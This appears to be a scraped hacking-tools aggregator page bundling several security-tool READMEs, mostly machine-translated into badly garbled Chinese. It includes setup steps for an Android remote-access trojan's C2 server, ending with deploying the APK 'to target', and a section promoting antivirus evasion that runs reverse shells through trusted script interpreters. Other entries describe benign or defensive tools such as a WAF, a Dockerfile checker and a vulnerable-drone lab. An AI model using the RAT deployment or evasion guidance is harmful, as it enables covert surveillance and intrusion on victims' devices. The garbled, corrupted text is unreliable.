Clone repository console git clone https://github.com/Tomiwa-Ot/moukthar.git Install php, composer, mysql, php-mysql driver, apache2 and a2enmod Move server files to /var/www/html/and install dependencies console mv moukthar/Server/* /var/www/html/cd/var/www/html/html/c2-server composer install cd/var/www/www/html/html/web-socket/composer install cd/var/www/www/www chown -r www-data33:wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwa。 CHMOD -R 777。默认凭据是用户名: android和password: android创建新的SQL用户mysql创建用户'android'@'localhost'由'your-password'确定;将所有特权授予*。 *授予'android'@'localhost';冲洗特权; Set database credentials in c2-server/.env and web-socket/.env Execute database.sql Start web socket server or deploy as service in linux console php Server/web-socket/App.php # OR sudo mv Server/websocket.service /etc/systemd/system/sudo systemctl daemon-reload sudo systemctl enable websocket.service sudo systemctl start websocket.service modify/etc/apache2/sites-available/000-default.conf`

CustomLog $ {apache_log_dir}/access.log合并

- 修改/etc/apache2/apache2.confxml评论本节##选项collowsymlinks#alloverride none#note#要求全部拒绝#

添加此选项-Indexes DirectoryIndex app.php allowOverride都需要全部授予- 增加PHP文件上传最大大小/etc/php/./apache2/php.iniini;增加大小以允许从客户端上载_max_filesize=128m的大型文件上传;将post_max_size设置为upload_max_filesize + 1 post_max_size=129m-设置脚本标签中的Web套接字服务器地址inc2-server/src/vive/home.phpandc2-server/src/src/src/view/firate/features/firest.phpconsole const ws=new Websocket('ws33333333:/ip_ad3333333333333333333333333333333333330dress; - 使用命令thow cons sudo a2enmod重写sudo sudo服务apache2 restart-设置C2服务器和Web套接字服务器地址在Clientfunctionaly/utils.javajava public public public public public public c2_server='3http://localhost';

公共静态最终字符串web_socket_server='WS: //localhost:8080'; `````` - 使用Android Studio编译APK并部署到目标

屏幕截图

AVvXsEgwHFRUL4fRtWCv2KdCgG9CcyI0b7cGGPQ6 AVvXsEj5oPGdd4sBAhwm8wxgoQNDhwAXrTjjT4Jl AVvXsEgB4HJ-cbxQ1UQzLSEFOOIAVps785qCb8tS 3AVvXsEjn5k3lgH5mZlMrp0NGRv7JLK9p-nCwbwlD AVvXsEiqEq8hUBRrL4Zp-3gKVx_2UK_SF5PqIALZ 010-AVvXsEgwHFRUL4fRtWCv2KdCgG9CcyI0b7cGGPQ60-69506 AVvXsEgwHFRUL4fRtWCv2KdCgG9CcyI0b7cGGPQ60-69950-

todo

在仪表板屏幕截图上自动滚动日志无法正常工作/视频捕获时,当应用程序不在应用中使用focus下载文件中的download manager不起作用的目录中的列表的列表中未列出所有文件/文件夹

HireHackking

AVvXsEhQ4gFe7eZnXBsORv199DJWNEi45XKQiqee

LoboGuará是一个针对网络安全专业人员的平台,其各种功能侧重于网络威胁智能(CTI)。它提供的工具使识别威胁,监视数据泄漏,分析可疑域和URL等更容易。

功能

1。 SSL证书搜索

允许识别可能对组织构成威胁的域和子域。由受信任机构颁发的SSL证书是实时索引的,用户可以使用4个或更多字符的关键字进行搜索。

Note:当前数据库包含从2024年9月5日发出的证书。

2。 SSL证书发现

允许插入以进行监视的关键字。发出证书并且通用名称包含关键字(至少为5个字符)时,将显示给用户。

3。 跟踪链接

生成一个链接,以捕获攻击者的设备信息。当安全专业人员可以以某种方式与攻击者联系时,很有用。

4。 域扫描

对域进行扫描,显示与该域相关的WHOIS信息和子域。

5。 Web路径扫描

允许在URL上执行扫描以识别与该URL相关的URI(Web路径)。

6。 URL扫描

在URL上执行扫描,生成屏幕截图和页面的镜子。结果可以公开以协助取消恶意网站。

7。 URL监视

在返回HTTP 200代码之前,监视无活动应用程序的URL。在那一刻,它会自动启动URL扫描,为针对恶意站点的行动提供证据。

8。 数据泄漏

数据泄漏警报:监视器,并显示黑客论坛和网站上发布的几乎实时数据泄漏。 URL+用户+密码:允许通过URL,用户名或密码进行搜索,以帮助识别客户或员工泄漏的数据。

9。 威胁智力提要

将情报新闻集中在各种渠道中,使用户对最新威胁进行最新信息。

安装

应用程序安装已在Ubuntu 24.04服务器和Red Hat 9.4发行版中批准,其链接低于:

Ubuntu上的LoboGuará实施24.04

Red Hat上的LoboGuará实施9.4

也有一个dockerfile和docker-compose版本的LoboGuará。只需克隆回购和DO:

然后,Docker组成,请访问您的Web浏览器LocalHost:7405。

依赖项

在进行安装之前,请确保安装以下依赖项:

PostgreSQL Python 3.12 ChromeDriver and Google Chrome (version 129.0.6668.89) FFUF (version 2.0.0) Subfinder (version 2.6.6)

安装说明

Clone the repository: git clone https://github.com/olivsec/loboguara.git Enter the project directory3: cd loboguara/编辑配置文件: nano Server/app/config.py填写config.py file:中所需的参数

类Config:

secret_key='your_secret_key_here'

sqlalchemy_database_uri='postgresql: //guarauser:your_password_here@localhost/guaradb?sslmode=disable''

sqlalchemy_track_modifications=false

mail_server='smtp.example.com'

mail_port=587

mail_use_tls=true

mail_username='[EmailProtected]'

mail_password='your_smtp_password_here'

mail_default_sender='[EmailProtected]'

wasse_domains=['yourdomain1.my.id','yourdomain2.com','yourdomain3.net']

api_access_token='your_loboguara_api_token_here'

api_url='https://loboguara.olivsec.com.br/api'

chrome_driver_path='/opt/loboguara/bin/chromedriver'

Google_chrome_path='/opt/loboguara/bin/google-chrome'

ffuf_path='/opt/loboguara/bin/ffuf'

subfinder_path='/opt/loboguara/bin/subfinder'

log_level='错误'

log_file='/opt/loboguara/logs/loboguara.log'使安装脚本可执行并运行IT: sudo sudo chmod +x ./install.sh

sudo ./install.sh安装后启动服务: sudo -u loboguara/opt/loboguara/start.sh访问以下URL以注册LoboBoGuaráSuperAdmin

http://Your_Address:7405/admin AVvXsEhQ4gFe7eZnXBsORv199DJWNEi45XKQiqee

在线平台

访问loboGuará平台在线: https://loboguara.olivsec.com.br/

HireHackking

一个Python脚本,可让您使用Telethon库自动从电报朋友那里刮擦和下载故事。该剧本继续并从故事中保存了照片和视频以及他们的元数据。

关于故事访问的重要说明️

由于电报API限制,此脚本只能访问:的故事- 您已添加到朋友列表中的用户- 其隐私设置允许您查看其故事的用户

这是电报API的限制,无法绕过。

功能

Automatically scrapes all available stories from your Telegram friends Downloads both photos and videos from stories Stores metadata in SQLite database Exports data to Excel spreadsheet Real-time monitoring with customizable intervals Timestamp is set to (UTC+2) Maintains record of previously downloaded stories Resume capability Automatic retry mechanism

先决条件

Before running the script, you'll need:

python 3.7或更高的电报帐户帐户API凭据来自电报上的电报朋友,您想跟踪

需要Python软件包

pip install -r unigess.txt insupper.txt:

电视

OpenPyXl

附表

获取电报API凭据

访问https://My.telegram.org/auth登录您的电话号码单击“ API开发工具”填写form: App title3:您的应用程序名称harp name sharp name name name name name short short short short short name platflorm:可以将'desktop'spection 3: appi platsion 3: appi prospi'plats : appi trick 3 trick 3创建,即一个数字API_HASH:一字母的字母和数字确保这些凭据安全,您将需要它们运行脚本!

010-110克隆仓库: git克隆3https://github.com/unnohwn/telegram-story-scraper.git.git

cd telegram-story-scraper Install requirements: pip install -r requirements.txt Run the script: python TGSS.py On first run, you'll be prompted to enter: Your API ID Your API Hash Your phone number (with country code) Verification code (sent to your Telegram) Checking interval in seconds (default is 60)

设置和运行

The script: 1. Connects to your电报帐户2。定期检查您的朋友的新故事3。下载任何新故事(照片/视频)4。在SQLITE数据库5中存储元数据。将信息导出到Excel文件6。连续运行直至中断(CTRL+C)

它如何工作

010-110 SQLITE数据库包含: -USER_ID:故事创建者的Telegram用户ID -story_id:独特的故事标识符-TimestAmp: timestamp:故事时(utc+2) - filename 3333333333333333333333333333333333333333333:

数据存储

导出文件包含与数据库相同的信息,有用的:-轻松查看故事元数据- 过滤和排序- 数据分析- 与他人共享数据

数据库结构(Stories.db)

照片保存为AS: {user_id} _ {story_id} .jpg视频。 (违约: 60秒)持续持续到直到手动停止保持状态之间的状态避免下载

CSV和Excel Export(story_export.csv/xlsx)

同时支持照片和视频自动检测媒体类型可在原始质量中生成唯一的fileNames生成唯一的文件名生成唯一的文件名:01010-010-1110脚本包括: - 自动重新误差- 误差- 误差- 误差- 误差- 误差- 借用误差- 中断

媒体存储

受电报的速率限制故事必须目前处于活动状态(未过期)媒体下载尺寸限制根据电报的限制适用

详细功能

捐款!请随时提交拉动请求。

连续监视

此项目是根据MIT许可证获得许可的- 有关详细信息,请参见许可证文件。

媒体处理

此工具仅用于教育目的。确保TO :-尊重Telegram的服务条款- 在刮擦之前获得必要的权限- 使用负责任和道德- 遵守数据保护法规- 尊重用户隐私

HireHackking

DockF-Sec-Check有助于使您的Dockerfile命令更加安全。

完成

[X] Dockerfile

托多列表

中的第一级安全通知[]正确检测了Dockerfile。 [] Dockerfile中的二级安全通知。 [] Docker图像中的安全通知。 [] *****(私有存储库)

安装

来自源代码

您可以在安装前使用Virtualenv进行软件包依赖项。

git克隆https://github.com/osmankandemir/docf-sec-check.git

CD Docf-Sec-Check

python setup.py build

Python Setup.py安装

来自PYPI

该应用程序可在PYPI上找到。使用PIP:安装

PIP安装DocfSeccheck

来自Dockerfile

您可以在构建Dockerfile后在容器上运行此应用程序。您需要指定一条路径(您的本地路径)来扫描当地人中的码头。

Docker build -t docfseccheck。

Docker Run -V您的本地路径/dockerfile:/docf-sec-check/dockerfile docfseccheck -f/docf/docf-sec-check/dockerfile

来自Dockerhub

docker docker

docker run -v your局部路径/dockerfile:/docf-sec-check/dockerfile osmankandemir/docfseccheck:v1.0 -f/docf/docf/docf-sec-check/dockerfile 3

用法

-1010-dockerfile [dockerfile [dockerfile] Dockerfile路径。 - 文件dockerfile

功能用法

来自docfchecker import docfchecker

#dockerfile是您的文件路径。

DocFchecker(['Dockerfile'])

开发和贡献

请参阅;贡献.md

许可证

版权所有(C)2024 Osman Kandemir \ sufergpl-3.0许可。

捐赠

如果您喜欢Docf-Sec-Check,并且希望显示支持,则可以使用下面的按钮使用购买咖啡或GitHub赞助商功能。

或者

赞助商: https://github.com/sponsors/osmankandemir

您的支持将不胜感激

HireHackking

安全,自动化和多云的Bitwarden备份和导入系统

Lazywarden是一种Python自动化工具,旨在备份和还原保管库中的数据,包括Bitwarden附件。它使您可以将备份上传到多个云存储服务,并在多个平台上接收通知。它还提供了AES加密的备份,并使用Argon2使用密钥推导,从而确保了数据的最大安全性。

功能

最大安全性:具有AES-256加密和Argon2密钥推导的数据保护。自动备份和导入:使您的Bitwarden Vault保持最新并安全。完整性验证: SHA-256哈希,以确保每个备份的数据完整性。 ️多云支持:存储备份到服务,例如Dropbox,Google Drive,Pcloud,Mega,NextCloud,Seafile,Seafile,Storj,Cloudflare R2,Backblaze B2,Filebase(IPFS)和SMTP。 本地存储:将备份保存到本地路径以进行更大的控制。实时警报:不和谐,电报,NTFY和Slack上的即时通知。配x:与Caldav,Todoist和Vikunja集成以管理您的时间表。 Easy Deployment:用Docker组成的快速设置。 🤖完整的自动和自定义计划:自动备份,具有灵活的计划选项(每日,每周,每月,每年)。与Caldav,Todoist和Vikunja集成,以完成跟踪和电子邮件通知。 Bitwarden导出至keepASS: extort bitwarden项目到keepass数据库(KDBX),包括TOTP种子的登录,URI,自定义字段,卡,卡,身份附件和安全说明。

平台兼容性

HireHackking

Safeline是一个自托管的WAF(Web应用程序防火墙),可保护您的Web应用程序免受攻击和漏洞的影响。

Web应用程序防火墙通过过滤和监视Web应用程序和Internet之间的HTTP流量来帮助保护Web应用程序。通常,它可以保护Web应用程序免受SQL注入,XS,代码注入,OS命令注入,CRLF注入,LDAP注入,XPATH注入,RCE,XXE,SSRF,PATH TRARVERSAL,BACKDOOR,BACKDOOR,BRUTEFORCE,HTTP-FLOOD,HTTP-FLOOD,BOT滥用等等。

它的工作原理

通过将WAF部署在Web应用程序的前面,在Web应用程序和Internet之间放置了屏蔽。虽然代理服务器通过使用中介机构来保护客户端计算机的身份,但WAF是一种反向proxy,可以通过让客户端通过WAF在到达服务器之前通过WAF来保护服务器的曝光。

WAF通过过滤,监视和阻止任何恶意的HTTP/S流量来保护您的Web应用程序,并防止任何未经授权的数据离开该应用程序。它通过遵守一组政策来实现这一目标,以帮助确定什么流量是恶意的,哪些流量是安全的。就像代理服务器充当保护客户端身份的中级一样,WAF也以类似的方式运行,但充当了保护Web App Server免受潜在恶意客户端的反向代理中介。

它的核心功能包括:

Web攻击的防御措施主动滥用防御html JS代码加密基于IP IP限制Web访问控制列表010-10获得实时演示

屏幕截图

主要功能列表如下:

阻止Web攻击它为所有网络攻击辩护,例如SQL注入,XSS,代码注入,OS命令注入,CRLF注入,XXE,SSRF,PATH Traversal等。限制限制您的网络应用程序,以防止DOS攻击,蛮力尝试,交通浪费和其他类型的滥用,通过限制超过定义限制的流量。反机器人挑战的反机器人挑战,以保护您的网站免受机器人攻击,允许Humen用户,爬行者和机器人的限制。当身份验证挑战打开时,身份验证挑战时,访问者需要输入密码,否则将被阻止。动态保护当动态保护打开时,每次访问时,Web服务器中的HTML和JS代码都会动态加密。

HireHackking

byosi

- 带上自己的脚本插图

- 利用受信任的应用程序的滥用,可以为Windows,Mac或Linux系统提供兼容的脚本解释,以及以特定脚本解释器的形式提供的恶意源代码。一旦恶意源代码和受信任的脚本Interpeter安全地写入目标系统,就可以简单地通过受信任的脚本解释器执行上述源代码。

polyDrop

- 利用第三种脚本语言执行上述攻击。

The following langues are wholly ignored by AV vendors including MS-Defender: - tcl - php - crystal - julia - golang - dart - dlang - vlang - nodejs - bun - python - fsharp -丹诺

所有这些语言都可以完全执行,并由MS-Defender建立反向外壳。我们假设列表更长,因为诸如PHP之类的语言被认为是“死”语言。

- 当前大多数主流端点 - 端口响应供应商目前无法检测。

无法扫描或处理PHP文件类型的供应商总数为14,它们在:以下列出

Alibaba Avast-Mobile BitDefenderFalx Cylance DeepInstinct Elastic McAfee Scanner Palo Alto Networks SecureAge SentinelOne (Static ML) Symantec Mobile Insight Trapmine Trustlook Webroot And the total number of vendors that are unable to accurately identify malicious PHP scripts is 54, and they are listed below:

Acronis(静态ML)AHNLAB-V3 Alyac Alyac Alyac Artiy-Avl Arcabit Avira(无云)Baidu Bitdefender bitdefenderTefenderTheta Clamav Cmc CRAWDSTRIKE CRAWDSTRIKE CYBERSTRIKE CYBEREAN CYNENET CYNET CYNET DRWEWEBE drwebe emsisoft eSteSoft eSteSoft Estecan Eset eset eset eset eSet-nod32 fort nod32 fortinet gdata gdata gridisef(no) lionic恶意软件最大最大纳米抗病毒panda QuickSheal发动机零天海(SWG)Shophos Sphyos Suphos Superantispyware Symantec Tachyon tachyon tachyon tachyon tencent tencent tencent Trellix(ens)Trellix(ENS)Trellix(HX)Trellix(HX)考虑到这一点,检查点分区以及确定基于PHP的恶意软件的绝对缺点,我们提出了这样的理论,即这些供应商也是这些供应商的监督,包括CrowdStrike,Sentinel1,Palo Alto,Fortinet等。我们至少能够确定这些明显的恶意发挥作用。

免责声明

我们作为维护者,绝不负责滥用或滥用该产品。这是出于合法的渗透测试/红色团队目的和教育价值出版的。在使用此脚本之前,请先了解您所在国家/地区的适用法律,并且在使用此脚本时不要违反法律。谢谢你,祝你有美好的一天。

编辑

如果您看到了所有默认声明,并想知道WTF家伙。是有原因的;这是为以后版本而建造的。目前,请享受该工具,并随时发布问题。它们将尽快解决。

HireHackking

Secator是用于安全评估的任务和工作流跑步者。它支持数十种著名的安全工具,旨在提高五旬续和安全研究人员的生产率。

功能

策划的命令列表统一输入选项统一输出架构CLI和库用法分布式选项具有芹菜复杂性,从简单任务到复杂的工作流程可自定义

支持的工具

Secator集成以下工具333660

名称说明类别HTTPX快速http探针。 HTTP Cariddi快速爬行者和端点秘密/API键/令牌匹配器。 http/crawler gau离线URL爬行者(外星库,Wayback Machine,Common Crawl,Urlscan)。 http/crawler gospider快速网络蜘蛛写了。 HTTP/爬行者Katana的下一代爬行和蜘蛛框架。 http/crawler dirsearch Web路径发现。 HTTP/Fuzzer Feroxbuster简单,快速,递归内容发现工具用Rust编写。 http/fuzzer ffuf快速Web Fuzzer用GO编写。 HTTP/Fuzzer H8mail电子邮件OSINT和漏洞狩猎工具。 OSINT DNSX快速而多功能DNS工具包,专为运行DNS查询而设计。 Recon/DNS dns dnsxbrute快速,多功能DNS工具包设计用于运行DNS查询(BruteForce模式)。侦察/DNS子发现器快速子域查找器。侦察/DNS fping在本地网络上找到活着的主机。侦察/IP MAPCIDR展开CIDR范围为IPS。侦察/IP Naabu快速端口发现工具。侦察/端口Maigret在许多网站上寻找用户帐户。侦察/用户GF围绕GREP包装,以避免键入常见模式。标记Grype容器图像和文件系统的漏洞扫描仪。 vuln/code dalfox强大的XSS扫描工具和参数分析仪。 VULN/HTTP MSFCONSOLE CLI访问和使用Metasploit框架。 VULN/HTTP WPSCAN WORDPRESS安全扫描仪使用NSE脚本vuln/多NMAP漏洞扫描仪。基于简单的基于YAML的DSL,vuln/多核快速而定制的漏洞扫描仪。 VULN/MULTI SEERCEPLOIT利用搜索器。开发/搜索可以随意要求通过打开问题添加新工具,但是请检查该工具是否符合我们的选择标准。如果不是,但是您仍然想将其集成到隔离器中,则可以将其插入(请参阅《开发指南》)。

安装

010-110 PIPXPIPX安装serpator pippip安装secator secator bashwget -o -https://raw.githubusercontent.com/freelabz/secator/secator/main/scripts/scripts/scripts/install.sh.sh | SH DockerDocker运行-IT -RM -NET=主机-V〜/.Secator:/root/.secator freelabz/secator -secator -Help -Help卷安装-V对于将所有Secator报告保存到您的主机机器中,并且建议将所有Secator报告保存到您的主机机器中,并建议主机提供对主机网络的全面访问。 You can alias this command to run it easier: alias secator='docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator' Now you can run secator like if it was installed on baremetal: secator --help Docker Composegit clone https://github.com/freelabz/secator

CD Secator

Docker -compose -d

Docker-Compose Execsecator-Secator-Help Note:如果选择Bash,Docker或Docker组成的安装方法,则可以跳过下一部分并直接使用使用。

安装隔离

Secator使用外部工具,因此您可能需要安装这些工具使用的语言,假设它们尚未安装在系统上。

如果您不进行外部管理,我们提供安装所需语言的实用程序:

GoSecator install langs go rubysecator install langs ruby

安装语言

Secator默认情况下没有安装其支持的任何外部工具。

我们提供实用程序来安装或更新每个受支持的工具,该工具应适用于支持APT:的所有系统

所有ToolssSecator安装工具特定工具secator secator sental selpt tool tool_name例如,要安装`httpx`,use: secator install install install interm httpx httpx,请确保在运行secator之前为每个工具使用最新的可用版本,否则您可能会遇到解析/格式化/格式化问题。

安装工具

Secator安装了最低依赖量。

有几个可用于Secator:

工人增加了对芹菜工人的支持(请参阅[[分布式运行芹菜](https://docs.freelabz.com/in-depth/distributed-runs-with-celery))。 Secator Install Adds Google Google添加了对Google Drive Exporter(`-o gdrive')的支持。 Secator Install添加Google MongoDB添加了对MongoDB驱动程序(`-driver Mongodb`)的支持。 Secator Install添加MongoDB Redis添加了对Redis后端(芹菜)的支持。 Secator Install Add Redis Dev添加了开发工具,例如运行测试所需的“覆盖范围”和“ flake8”。 Secator Install添加DEV跟踪添加跟踪工具,例如跟踪功能所需的“ Memray”和“ Pyinstrument”。 Secator Install添加跟踪构建添加``孵育''用于构建和发布PYPI软件包。 Secator Install添加构建

安装插件

SECATOR将远程API调用访问https://cve.circl.lu/,以获取有关其遇到的CVE的数据信息。我们提供了一个子命令,可以在本地下载所有已知的CVE,以便未来的外观是由磁盘制成的:

Secator安装CVE

安装CVE

以找出系统上安装了哪些语言或工具(以及其版本):

Secator Health

检查安装健康

Secator-Help

用法

运行模糊任务(FFUF):

Secator X FFUF http://Testphp.vulnweb.com/fuzz运行url爬网工作流:

Secator W url_crawl http://Testphp.vulnweb.com运行主机Scan:

Secator S主持mydomain.com等.列出可以使用:的所有任务/工作流/扫描

Secator X - 螺旋

隔离- 螺旋桨

Secator S-Help

用法示例

要加入Secator,请查看: *我们的完整文档*我们的入门启动教程视频*我们的媒体帖子*在twitter上@freelabz上关注我们

HireHackking

该死的脆弱的无人机是基于流行的Ardupilot/Mavlink架构的有意脆弱的无人机黑客模拟器,为动手无人机黑客入侵提供了现实的环境。

关于该死的脆弱无人机

该死的脆弱无人机是什么?

该死的脆弱无人机是一个虚拟模拟的环境,旨在为进攻安全专业人员安全地学习和练习无人机黑客黑客入侵技术。它模拟了现实世界中的Ardupilot Mavlink无人机架构和漏洞,从而提供了动手实践的无人机系统体验。

010-110该死的脆弱的无人机旨在在受控环境中提高进攻性安全技能,使其成为中级安全专业人员,五旬节和黑客攻击爱好者的宝贵工具。

与飞行员如何利用飞行模拟器进行训练,我们可以使用该死的脆弱的无人机模拟器来获得对现实世界无人机系统的深入了解,了解其脆弱性,并学习有效的方法来利用它们。

该死的脆弱的无人机平台是开源的,无需免费提供,专门设计用于解决与无人机硬件,黑客式工具和维护相关的大量费用。它的无成本性质允许用户无人关注而将自己沉浸在无人机黑客攻击中。这种可访问性使该死的脆弱的无人机成为信息安全和渗透测试领域的人的残酷资源,从而促进了安全环境中进攻性网络安全技能的发展。

为什么要建造?

该死的脆弱的无人机平台按照软件中的原理(SITL)运行,这是一种模拟技术,允许用户运行无人机软件,就好像它在实际无人机上执行一样,从而复制真实的无人机行为和响应。

Ardupilot的SITL允许在虚拟环境中执行无人机的固件,模仿无需物理硬件而无需实体无人机的行为。通过动态的3D机器人模拟器Guazebo进一步增强了该模拟,该模拟器为无人机提供了一个现实的环境和物理引擎。 Ardupilot的SITL和Gazebo一起为精致而真实的无人机模拟体验奠定了基础。

虽然当前该死的脆弱无人机设置并不能反映每个无人机体系结构或配置,但集成的策略,技术和场景广泛适用于各种无人机系统,模型和通信协议。

它如何工作?

基于Docker的Environment:在完全虚拟化的Docker设置中运行,使其可访问且可用于无人机黑客入侵实验。模拟无线网络:模拟WiFi(802.11)界面以练习无线无人机攻击。板载摄像头流式gimbal:模拟了带有饰品和伴随计算机集成的板上摄像机流。 Companion Computer Web界面:通过Web界面和模拟飞行控制器的串行连接,伴随计算机配置管理。 Q groundControl/Mavproxy Integration:一键式QgroundControl UI启动(仅在X86体系结构上支持)具有Mavproxy GCS Integration。 Mavlink路由器Integration:通过MAVLINK路由器在配套计算机Web界面上通过Mavlink路由器转发。动态飞行登录:存储在模拟的SD卡上的完全动态的ArdupiLot飞行箱记录。管理Web控制台:易于使用模拟器管理Web控制台,用于触发场景和无人机飞行状态。全面的黑客方案:非常适合练习从基本侦察到高级剥削的各种无人机黑客入侵技术。详细的演练:如果您需要在特定情况下进行帮助,则可以利用详细的演练文档作为扰流板。

HireHackking

File-UnPumper是一个强大的命令行实用程序,旨在清洁和分析便携式可执行文件(PE)文件。它提供了一系列功能,可帮助开发人员和安全专业人员更有效地使用PE文件。

功能

PE标头FIXING :文件unpumper可以修复并对齐给定可执行文件的PE标头。这对于解决修改标题的包装工或混淆器引起的问题特别有用。

资源提取:该工具可以从PE文件中提取嵌入式资源,例如图标,位图或其他数据资源。这有助于逆向工程或分析可执行文件的内容。

元数据分析3:文件unpumper对PE文件的元数据进行了全面分析,包括有关机器架构,部分,时间戳,子系统,图像库和部分详细信息的信息。

文件清洁:文件unpumper的核心功能是从PE文件中删除任何“泵送”或填充的数据,从而导致可执行文件的清洁版本。这可以帮助进行恶意软件分析,逆向工程或简单地减少文件大小。

并行处理:为了确保有效的性能,File-unPumper使用人造丝板条箱利用并行处理的功能,从而使其可以轻松处理大型文件。

进度跟踪:在文件清洁过程中,显示了一个进度栏,可视觉指示操作的进度和估计的剩余时间。

安装

文件unpumper用RUST书写,可以使用货物软件包Manager :轻松安装

货物安装文件unpumper

用法

Input:输入PE文件的路径。

选项

-fix-headers:修复并对齐输入文件的PE标头。 - 从输入文件中提取嵌入资源的提取资源。 - Analyze-Metadata:分析并显示PE文件的元数据。 -h,-help:打印帮助信息。 -v,-version:打印版本信息。

示例

清洁PE文件,然后删除任何“泵送” data: bash file-unpumper路径/to/input.exe

修复PE标题并分析File: bash file-unpumper的元数据-Fix-headers--analyze-metadata path/to/input.exe.exe

从PE File: bash file-unpumper -extract-Resources path/to/input.exe中提取资源

在File: bash file-unpumper -fix-headers -extract-resources -Analyze-metadata路径/to/input.exe上执行所有可用操作。

欢迎

贡献

对文件unpumper的捐款!如果您遇到任何问题或有改进的建议,请在GitHub存储库上开设问题或提交拉动请求。

ChangElog

最新更改可以在ChangElog.md中找到

许可证

文件unpumper根据MIT许可发布。